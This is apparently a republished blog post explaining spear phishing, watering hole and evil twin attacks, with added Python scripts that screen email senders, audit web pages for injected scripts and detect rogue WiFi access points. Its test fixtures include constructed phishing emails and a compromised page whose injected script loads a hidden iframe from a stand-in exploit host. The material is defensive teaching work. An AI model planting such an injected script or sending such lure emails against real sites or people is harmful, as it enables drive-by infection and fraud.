What are spear phishing, watering hole, and evil twin attacks?

Spear phishing, watering hole, and evil twin attacks are cybersecurity threats staged by attackers trying to get at the personal and financial information of you, your employees, your customers, and your vendors. These tactics have evolved considerably over the past two decades and rely largely on social engineering, which makes them difficult to detect even for seasoned tech users. Effective business information security requires more than tech-savvy employees; it requires built-in defenses that can identify phishing, scams, and data breaches before they succeed.

Protecting against these attacks is easier said than done, especially for financial organizations that are in frequent communication with third-party vendors and routinely exchange payments and account credentials. What spear phishing, watering hole, and evil twin attacks have in common is that the attacker impersonates something credible (a person, an organization, or a wireless network) in order to glean or intercept information, which presents particular challenges for the financial sector. Fortunately, there are definitive defense strategies that can be built into day-to-day security and largely mitigate the risk.

Spear Phishing

The most successful attack method on this list is spear phishing, named for its precise, targeted nature. It differs from ordinary phishing in how personalized it is: phishing usually targets large groups of victims at once, while spear phishing is tailored to a few. Attackers pose as friends, colleagues, vendors, or family members of the victim, researching the people they impersonate so the message seems credible. Once contact is made, the attacker tries to obtain account credentials or financial information, or to get the victim to open an attachment or link that installs malware.

Part of what makes spear phishing so effective against organizations is how hard it is for spam filtering to catch. Because the messages appear to come from real people or credible organizations, and are sent in small volumes rather than in bulk, they often reach their intended recipients’ inboxes. With so much personal information available on social media, networking sites like LinkedIn, and company websites, attackers have a wealth of material at their fingertips to hone their campaigns. Two variants have their own names: whaling, where the spear-phishing target is itself a high-level executive, and CEO fraud (a form of business email compromise), where an attacker impersonates an executive to pressure lower-level employees, who are inclined to provide whatever an exec asks for.

The retailer Target was breached this way when attackers stole log-in credentials from one of its vendors. Another example is the European manufacturer Leoni AG, which lost roughly 40 million euros after its finance department was tricked into transferring money to an attacker-controlled account.

Defense strategies:

To prevent successful spear phishing campaigns at your organization, there are several effective things you can do beyond the usual spam filters, antivirus, and malware detection software, like:

  • Spear phishing simulation tests
  • User education that teaches recipients to screen for unusual wording or lingo, pressure for urgency or secrecy, and sender addresses that are slightly off
  • A simple process for employees to report suspicious emails
  • Tagging emails from outside the organization with an “external” banner
  • Data protection programs or data loss prevention software
  • Having employees update software right away, since updates frequently include security fixes
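Several of the items above (spotting sender addresses that are slightly off, tagging outside mail as external, recognizing an executive’s name on a message that did not come from the executive) can be automated at the mail gateway. The script below is an added example, not code from the original post or from Gate 39 Media. It runs those checks over raw message headers. The organization’s domain, trusted vendor domains, executive directory, and the three messages are constructed for illustration.

```python
"""Heuristic sender checks for spear phishing (added example)."""
import difflib
from email import message_from_string, policy
from email.utils import parseaddr

# Assumed data: the organisation's own domain, the vendor domains it
# legitimately exchanges mail with, and a small executive directory.
OUR_DOMAIN = "example-fin.com"
TRUSTED_DOMAINS = {OUR_DOMAIN, "acme-vendor.com", "bank-partner.com"}
EXECUTIVES = {"jane doe": "jane.doe@example-fin.com"}

# Character swaps attackers use to register lookalike domains.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def normalize(domain: str) -> str:
    """Fold confusable spellings so 'acme-vend0r.com' reads as 'acme-vendor.com'."""
    d = domain.lower()
    for fake, real in CONFUSABLES:
        d = d.replace(fake, real)
    return d


def lookalike_of(domain: str):
    """Return the trusted domain that `domain` imitates, or None."""
    domain = domain.lower()
    if domain in TRUSTED_DOMAINS:
        return None
    folded = normalize(domain)
    for trusted in TRUSTED_DOMAINS:
        if folded == normalize(trusted):
            return trusted
        # Catch one-character additions/omissions such as acme-vendors.com
        if difflib.SequenceMatcher(None, folded, trusted).ratio() >= 0.9:
            return trusted
    return None


def domain_of(address: str) -> str:
    return address.rpartition("@")[2].lower()


def screen(raw_message: str):
    """Return a list of (code, detail) findings for one raw message."""
    msg = message_from_string(raw_message, policy=policy.default)
    from_name, from_addr = parseaddr(str(msg.get("From", "")))
    from_domain = domain_of(from_addr)
    findings = []

    imitated = lookalike_of(from_domain)
    if imitated:
        findings.append(("lookalike-domain", f"{from_domain} resembles {imitated}"))

    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    if reply_addr and domain_of(reply_addr) != from_domain:
        findings.append(("reply-to-mismatch", f"replies go to {reply_addr}"))

    real_addr = EXECUTIVES.get(from_name.strip().lower())
    if real_addr and from_addr.lower() != real_addr:
        findings.append(("exec-impersonation", f"{from_name} is really {real_addr}"))

    if from_domain != OUR_DOMAIN:
        findings.append(("external", "tag subject with [EXTERNAL]"))
    return findings


def codes(raw_message: str):
    return {code for code, _ in screen(raw_message)}


# Constructed sample messages (not real mail).
MSG_CLEAN = """From: Accounts Receivable <billing@acme-vendor.com>
To: ap@example-fin.com
Subject: Invoice 4471

Attached as usual.
"""

MSG_LOOKALIKE = """From: Accounts Receivable <billing@acme-vend0r.com>
Reply-To: collections@mailbox-ru.example
To: ap@example-fin.com
Subject: Updated bank details for invoice 4471

Please remit to the new account below.
"""

MSG_CEO_FRAUD = """From: Jane Doe <jane.doe@webmail.example>
To: ap@example-fin.com
Subject: Urgent wire, keep this between us

I am in a meeting, please process the transfer now.
"""

if __name__ == "__main__":
    for name, raw in (("clean", MSG_CLEAN), ("lookalike", MSG_LOOKALIKE), ("ceo-fraud", MSG_CEO_FRAUD)):
        print(name, screen(raw))
```

None of these checks replaces SPF, DKIM, or DMARC; they catch the cases those protocols do not, namely a correctly authenticated message from a domain the attacker registered to look like yours, or from a free webmail account carrying an executive’s display name.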

Individuals can mitigate the risk of spear phishing campaigns with:

  • Creating strong, unique passwords and turning on multi-factor authentication wherever it is offered
  • Limiting how much personal information they post on the Internet
  • Going directly to websites instead of clicking links in emails
  • Not providing usernames or passwords to anyone, regardless of how the request is made

It is harder for those working in the financial sector to avoid clicking on external links or to constantly scrutinize the addresses of incoming mail, because they work with so many vendors and process so many payments. To help mitigate this, they need more structured, automated controls, including a fixed procedure for confirming any change in payment instructions over a previously known phone number before money moves.

Watering Hole Attacks

Next up are watering hole attacks, named after the watering holes where predators ambush prey that have gathered to drink. Victims usually belong to a particular organization or industry, so attackers cast a wider net than with spear phishing. After identifying which websites the target group frequents, attackers compromise one of those sites (often through a vulnerable content management system or plugin) and plant code that serves malware or a browser exploit to visitors. Once one or more individuals have been infected, attackers have a foothold from which to move further into the organization’s network.

Many companies and groups have been victims of watering hole attacks, including Facebook, banks, defense organizations, and activist groups. In 2017, attackers staged a country-level campaign in China, while others compromised a Ukrainian government website with malware that wiped the contents of victims’ hard drives.

Defense strategies:

To protect against watering hole attacks, companies can:

  • Keep browsers, plugins, and operating systems patched, since drive-by downloads depend on unpatched client vulnerabilities; site owners should likewise patch their web platforms so their own site cannot be turned into a watering hole
  • Use web filtering or URL reputation so that security tools block access to known-infected websites
  • Add extra layers of threat protection such as behavioral analysis on endpoints
  • Route browsing through a secure web gateway that inspects traffic and can test exposure to compromised sites
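From the site owner’s side, a watering hole compromise usually shows up as a page that now loads a script from a host the attacker controls, or as a new inline script that was never part of the site. The following is an added example, not code from the original post or from Gate 39 Media: it lists every script a page loads and reports anything outside an allowlist of script hosts or a baseline of known inline scripts, which is a check a site owner can run against a fetched copy of each page. The pages, hostnames, and allowlist are constructed.

```python
"""Integrity check for watering-hole script injection (added example)."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None  # accumulates text while inside an inline <script>

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip())
            self._buf = None


def collect(html_text):
    p = ScriptCollector()
    p.feed(html_text)
    p.close()
    return p.external, p.inline


def inline_hashes(html_text):
    """SHA-256 of each inline script; build this from a known-good copy."""
    return {hashlib.sha256(body.encode()).hexdigest() for body in collect(html_text)[1]}


def audit(html_text, allowed_hosts, known_inline):
    """Return (code, detail) findings for scripts not in the baseline."""
    external, inline = collect(html_text)
    findings = []
    for src in external:
        host = urlparse(src).hostname
        if host is None:
            continue  # relative URL, served from the site itself
        if host.lower() not in allowed_hosts:
            findings.append(("unexpected-script-host", src))
    for body in inline:
        digest = hashlib.sha256(body.encode()).hexdigest()
        if digest not in known_inline:
            findings.append(("unknown-inline-script", body[:40]))
    return findings


# Assumed allowlist of hosts the site legitimately loads scripts from.
ALLOWED_HOSTS = {"www.example-fin.com", "cdn.example-fin.com"}

# Constructed known-good page and a constructed compromised copy of it.
BASELINE_PAGE = """<html><head>
<script src="https://cdn.example-fin.com/js/app.js"></script>
<script>window.siteVersion = "4.2";</script>
</head><body><h1>Member login</h1></body></html>"""

COMPROMISED_PAGE = """<html><head>
<script src="https://cdn.example-fin.com/js/app.js"></script>
<script>window.siteVersion = "4.2";</script>
<script src="//stats-cdn.example/jquery.min.js"></script>
<script>var i=document.createElement("iframe");i.src="https://exploit.example/k";i.style.display="none";document.body.appendChild(i);</script>
</head><body><h1>Member login</h1></body></html>"""

if __name__ == "__main__":
    baseline = inline_hashes(BASELINE_PAGE)
    print("baseline:", audit(BASELINE_PAGE, ALLOWED_HOSTS, baseline))
    print("current: ", audit(COMPROMISED_PAGE, ALLOWED_HOSTS, baseline))
```

The same allowlist can be enforced in the browser by publishing it as a Content-Security-Policy `script-src` directive, so that an injected script from an unlisted host is refused even before the owner’s audit notices it.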

Evil Twin Attacks

Last but (unfortunately) not least are evil twin attacks, named for the way attackers clone a public WiFi access point and then eavesdrop on the user’s activity, information, and credentials. The attacker broadcasts an access point with the same network name (SSID), and often the same security settings, as the real one, so neither the user nor the device can tell the two apart by name alone. A public hotspot at a coffee shop or conference may therefore not actually belong to that location; it just appears to.

Once the attacker controls the user’s connection, they can read any unencrypted traffic, serve fake login or captive-portal pages, and attempt to push malicious downloads, which is especially dangerous for employees trying to reach company sites: once the attacker has captured log-in information, they can keep it and reuse it. Even if a user does not initially connect to the fake hotspot, the attacker can disrupt the connection to the legitimate one (for example by sending deauthentication frames), so the device reconnects to the stronger-looking “evil twin.”

Many perpetrators have used evil twin attacks successfully. In one example, a Russian military intelligence unit used rogue WiFi access points to target organizations including nuclear power operators and chemical testing laboratories. Because the rogue access points were backhauled over real 4G LTE connections, they provided working internet access and did not arouse suspicion.

Defense strategies:

With evil twin attack prevention, there are several fairly straightforward strategies:

  • WiFi intrusion prevention systems (WIPS), which detect access points broadcasting your network name that are not yours
  • Phishing-resistant credentials such as hardware security keys for employees and customers, so that captured passwords cannot simply be replayed
  • Virtual private networks (VPNs), which encrypt traffic end to end when using public WiFi
  • Avoiding free public WiFi altogether, for example by tethering to a mobile connection
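The core WIPS check is simple enough to show in full. The script below is an added example, not code from the original post or from any WIPS vendor: any access point that broadcasts the organization’s network name but is not one of the organization’s own radios is a candidate evil twin, and one that also changes the security type (for example from WPA2 to open) is an even stronger signal. The scan export and the inventory of authorized access points are constructed; in practice they would come from the wireless controller or a scanning tool.

```python
"""Rogue access point detection from a WiFi scan (added example)."""
import csv
import io

# Assumed inventory: SSID -> BSSIDs (radio MAC addresses) we actually own.
AUTHORIZED = {
    "CorpWiFi": {"AA:BB:CC:00:01:10", "AA:BB:CC:00:01:11"},
}
EXPECTED_SECURITY = {"CorpWiFi": "WPA2-Enterprise"}

# Constructed scan export, one row per access point seen from a sensor.
SCAN_CSV = """ssid,bssid,channel,signal_dbm,security
CorpWiFi,AA:BB:CC:00:01:10,36,-48,WPA2-Enterprise
CorpWiFi,aa:bb:cc:00:01:11,44,-55,WPA2-Enterprise
CorpWiFi,DE:AD:BE:EF:00:01,6,-35,WPA2-Enterprise
CorpWiFi,DE:AD:BE:EF:00:02,1,-30,Open
CoffeeGuest,12:34:56:78:9A:BC,11,-60,Open
"""


def detect_evil_twins(scan_csv, authorized, expected_security):
    """Return (code, ssid, bssid, channel, signal_dbm) findings, strongest first.

    Strongest signal first because an evil twin is normally parked close to
    its victims and is the one a client will prefer.
    """
    findings = []
    for row in csv.DictReader(io.StringIO(scan_csv)):
        ssid = row["ssid"]
        if ssid not in authorized:
            continue  # somebody else's network; a WIPS only guards our SSIDs
        bssid = row["bssid"].upper()
        if bssid in authorized[ssid]:
            continue  # one of our own radios
        if row["security"] != expected_security.get(ssid):
            code = "evil-twin-security-downgrade"
        else:
            code = "evil-twin-cloned-ssid"
        findings.append((code, ssid, bssid, int(row["channel"]), int(row["signal_dbm"])))
    findings.sort(key=lambda f: f[4], reverse=True)
    return findings


if __name__ == "__main__":
    for finding in detect_evil_twins(SCAN_CSV, AUTHORIZED, EXPECTED_SECURITY):
        print(finding)
```

A clone that keeps the same security type is harder to spot and is the reason the BSSID inventory matters: the name, channel, and even the encryption can all be copied, but the attacker’s radio still has its own MAC address. On an 802.1X network the client’s validation of the authentication server certificate is what stops the clone from harvesting credentials, so that validation should not be left optional on managed devices.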

This post originally appeared on the Gate 39 Media website.